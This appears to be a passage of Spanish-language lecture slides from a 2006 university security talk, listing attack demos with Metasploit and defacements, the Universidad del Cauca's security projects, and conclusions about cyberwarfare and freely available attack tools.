  • 15. DEMO1 - ATAQUE MASIVO Escenario ZOMBIES ATACANTE MAESTRO Windows Linux Metasploit Win/XP/2K Scripts en Python SITI 2006 LAN http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  • 16. DEMO2 - DEFACED http://www.zone-h.com VIDEO RUSO
  • 17. ... Y en la Unicauca que? Preocupación del departamento de sistemas de la FIET sobre la problemática de la seguridad de la información. • Electiva de seguridad informática • Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado) • Legislación en comercio electrónico (Finalizado) • OBSES (Firewall Cluster Beowulf) (Finalizado) • INFORCE (Finalizado) • Antivirus-inteligente (En desarrollo) • Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (En desarrollo) • Proyecto de Auditoría informática UNICAUCA • Publicaciones
  • 18. CONCLUSIONES Los ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO… • USA • UK • CHINA • RUSIA Los sistemas de seguridad actuales son reactivos y correctivos. • Preventivos • Inteligentes Existen demasiadas herramientas de ataque gratis y disponibles en la red. Las técnicas de ataque cabian constantemente. Segun las estadísticas es muy probable que su sistema haya sido vulnerado y usted aún no lo sepa!!!.